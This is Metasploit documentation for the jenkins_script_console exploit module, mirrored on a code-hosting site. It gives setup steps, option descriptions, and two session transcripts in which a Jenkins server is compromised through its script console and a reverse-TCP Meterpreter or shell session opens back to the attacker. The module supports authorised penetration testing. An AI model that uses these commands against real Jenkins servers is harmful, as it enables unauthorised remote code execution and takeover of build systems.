dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
metasploit-framework/documentation/modules/exploit/multi/http/jenkins_script_console.md

8.8 KiB
Raw Permalink Blame History

Vulnerable Application

Jenkins can be downloaded from jenkins.io where binaries are available for a variety of operating systems. Both LTS and weekly builds are available.

Default settings have the script console enabled and require a valid user account in order to access it. A known account can be used with this module by setting the USERNAME and PASSWORD options.

This exploit has been tested against the following Jenkins versions:

  • 2.411
  • 2.410
  • 2.409
  • 2.401.1
  • 2.346.3
  • 2.103
  • 1.565

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/multi/http/jenkins_script_console
  4. Do: set RHOST [target host]
  5. Do: set TARGET [target id]
  6. Do: exploit
  7. You should get a shell.

Options

TARGETURI

The path to the target instance of Jenkins.

USERNAME

A username to an account that has access to the script console. This is only necessary if the Jenkins instance has been configured to require authentication.

PASSWORD

A password to an account that has access to the script console. This is only necessary if the Jenkins instance has been configured to require authentication and you aren't using an API_TOKEN (see below).

API_TOKEN

An API token to an account that has access to the script console. This is only necessary if the Jenkins instance has been configured to require authentication and you aren't using a PASSWORD (see above).

Scenarios

Example usage against a Windows 7 SP1 x64 bit target running Jenkins 2.19.1.

msf > use exploit/multi/http/jenkins_script_console
msf exploit(jenkins_script_console) > set TARGETURI /
TARGETURI => /
msf exploit(jenkins_script_console) > set USERNAME steiner
USERNAME => steiner
msf exploit(jenkins_script_console) > set PASSWORD I<3msf!
PASSWORD => I<3msf!
msf exploit(jenkins_script_console) > set RHOST 192.168.254.126
RHOST => 192.168.254.126
msf exploit(jenkins_script_console) > set RPORT 8080
RPORT => 8080
msf exploit(jenkins_script_console) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(jenkins_script_console) > set LHOST 192.168.254.132
LHOST => 192.168.254.132
msf exploit(jenkins_script_console) > exploit

[*] [2016.10.29-18:43:07] Started reverse TCP handler on 192.168.254.132:4444
[*] [2016.10.29-18:43:07] Checking access to the script console
[*] [2016.10.29-18:43:07] Logging in...
[*] [2016.10.29-18:43:07] Using CSRF token: '9623d245b9d60b5ceda72e2d3613431c' (Jenkins-Crumb style)
[*] [2016.10.29-18:43:07] 192.168.254.126:8080 - Sending command stager...
[*] [2016.10.29-18:43:08] Command Stager progress -   2.06% done (2048/99626 bytes)
[*] [2016.10.29-18:43:08] Command Stager progress -   4.11% done (4096/99626 bytes)
[*] [2016.10.29-18:43:08] Command Stager progress -   6.17% done (6144/99626 bytes)
[*] [2016.10.29-18:43:09] Command Stager progress -   8.22% done (8192/99626 bytes)
[*] [2016.10.29-18:43:09] Command Stager progress -  10.28% done (10240/99626 bytes)
[*] [2016.10.29-18:43:09] Command Stager progress -  12.33% done (12288/99626 bytes)
[*] [2016.10.29-18:43:10] Command Stager progress -  14.39% done (14336/99626 bytes)
[*] [2016.10.29-18:43:10] Command Stager progress -  16.45% done (16384/99626 bytes)
[*] [2016.10.29-18:43:10] Command Stager progress -  18.50% done (18432/99626 bytes)
[*] [2016.10.29-18:43:11] Command Stager progress -  20.56% done (20480/99626 bytes)
[*] [2016.10.29-18:43:11] Command Stager progress -  22.61% done (22528/99626 bytes)
[*] [2016.10.29-18:43:11] Command Stager progress -  24.67% done (24576/99626 bytes)
[*] [2016.10.29-18:43:12] Command Stager progress -  26.72% done (26624/99626 bytes)
[*] [2016.10.29-18:43:12] Command Stager progress -  28.78% done (28672/99626 bytes)
[*] [2016.10.29-18:43:12] Command Stager progress -  30.84% done (30720/99626 bytes)
[*] [2016.10.29-18:43:13] Command Stager progress -  32.89% done (32768/99626 bytes)
[*] [2016.10.29-18:43:13] Command Stager progress -  34.95% done (34816/99626 bytes)
[*] [2016.10.29-18:43:13] Command Stager progress -  37.00% done (36864/99626 bytes)
[*] [2016.10.29-18:43:14] Command Stager progress -  39.06% done (38912/99626 bytes)
[*] [2016.10.29-18:43:14] Command Stager progress -  41.11% done (40960/99626 bytes)
[*] [2016.10.29-18:43:14] Command Stager progress -  43.17% done (43008/99626 bytes)
[*] [2016.10.29-18:43:15] Command Stager progress -  45.23% done (45056/99626 bytes)
[*] [2016.10.29-18:43:15] Command Stager progress -  47.28% done (47104/99626 bytes)
[*] [2016.10.29-18:43:15] Command Stager progress -  49.34% done (49152/99626 bytes)
[*] [2016.10.29-18:43:16] Command Stager progress -  51.39% done (51200/99626 bytes)
[*] [2016.10.29-18:43:16] Command Stager progress -  53.45% done (53248/99626 bytes)
[*] [2016.10.29-18:43:17] Command Stager progress -  55.50% done (55296/99626 bytes)
[*] [2016.10.29-18:43:17] Command Stager progress -  57.56% done (57344/99626 bytes)
[*] [2016.10.29-18:43:17] Command Stager progress -  59.61% done (59392/99626 bytes)
[*] [2016.10.29-18:43:18] Command Stager progress -  61.67% done (61440/99626 bytes)
[*] [2016.10.29-18:43:18] Command Stager progress -  63.73% done (63488/99626 bytes)
[*] [2016.10.29-18:43:18] Command Stager progress -  65.78% done (65536/99626 bytes)
[*] [2016.10.29-18:43:19] Command Stager progress -  67.84% done (67584/99626 bytes)
[*] [2016.10.29-18:43:19] Command Stager progress -  69.89% done (69632/99626 bytes)
[*] [2016.10.29-18:43:19] Command Stager progress -  71.95% done (71680/99626 bytes)
[*] [2016.10.29-18:43:20] Command Stager progress -  74.00% done (73728/99626 bytes)
[*] [2016.10.29-18:43:20] Command Stager progress -  76.06% done (75776/99626 bytes)
[*] [2016.10.29-18:43:20] Command Stager progress -  78.12% done (77824/99626 bytes)
[*] [2016.10.29-18:43:21] Command Stager progress -  80.17% done (79872/99626 bytes)
[*] [2016.10.29-18:43:21] Command Stager progress -  82.23% done (81920/99626 bytes)
[*] [2016.10.29-18:43:21] Command Stager progress -  84.28% done (83968/99626 bytes)
[*] [2016.10.29-18:43:22] Command Stager progress -  86.34% done (86016/99626 bytes)
[*] [2016.10.29-18:43:22] Command Stager progress -  88.39% done (88064/99626 bytes)
[*] [2016.10.29-18:43:22] Command Stager progress -  90.45% done (90112/99626 bytes)
[*] [2016.10.29-18:43:23] Command Stager progress -  92.51% done (92160/99626 bytes)
[*] [2016.10.29-18:43:23] Command Stager progress -  94.56% done (94208/99626 bytes)
[*] [2016.10.29-18:43:23] Command Stager progress -  96.62% done (96256/99626 bytes)
[*] [2016.10.29-18:43:24] Command Stager progress -  98.67% done (98304/99626 bytes)
[*] [2016.10.29-18:43:24] Sending stage (957999 bytes) to 192.168.254.126
[*] [2016.10.29-18:43:24] Command Stager progress - 100.00% done (99626/99626 bytes)
[*] Meterpreter session 1 opened (192.168.254.132:4444 -> 192.168.254.126:49258) at 2016-10-29 18:43:26 -0400

meterpreter > sysinfo
Computer        : PWNME-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter >

Example usage against a Linux x64 bit target running Jenkins 2.46.3.

msf > use exploit/multi/http/jenkins_script_console
msf exploit(jenkins_script_console) > set RHOST 172.17.0.1
RHOST => 172.17.0.1
msf exploit(jenkins_script_console) > set RPORT 8080
RPORT => 8080
msf exploit(jenkins_script_console) > set TARGETURI /
TARGETURI => /
msf exploit(jenkins_script_console) > set USERNAME admin
USERNAME => admin
msf exploit(jenkins_script_console) > set API_TOKEN 24e0b80d009ed12590ff85866d88c00d
API_TOKEN => 24e0b80d009ed12590ff85866d88c00d
msf exploit(jenkins_script_console) > set TARGET 1
TARGET => 1
msf exploit(jenkins_script_console) > set PAYLOAD linux/x86/shell/reverse_tcp
PAYLOAD => linux/x86/shell/reverse_tcp
msf exploit(jenkins_script_console) > set LHOST 10.0.2.4
LHOST => 10.0.2.4
msf exploit(jenkins_script_console) > exploit

[*] Started reverse TCP handler on 10.0.2.4:4444 
[*] Checking access to the script console
[*] Authenticating with token...
[*] Using CSRF token: 'd41639a6f5721760a8ee3df5d6a71eec' (Jenkins-Crumb style)
[*] 172.17.0.1:8080 - Sending Linux stager...
[*] Sending stage (36 bytes) to 172.17.0.2
[*] Command shell session 1 opened (10.0.2.4:4444 -> 172.17.0.2:53962) at 2017-06-19 16:55:42 -0500
[!] Deleting /tmp/AsqL5Pg payload file

whoami
jenkins
id
uid=1000(jenkins) gid=1000(jenkins) groups=1000(jenkins)
uname -a
Linux b4b4e715101e 4.4.0-79-generic #100-Ubuntu SMP Wed May 17 19:58:14 UTC 2017 x86_64 GNU/Linux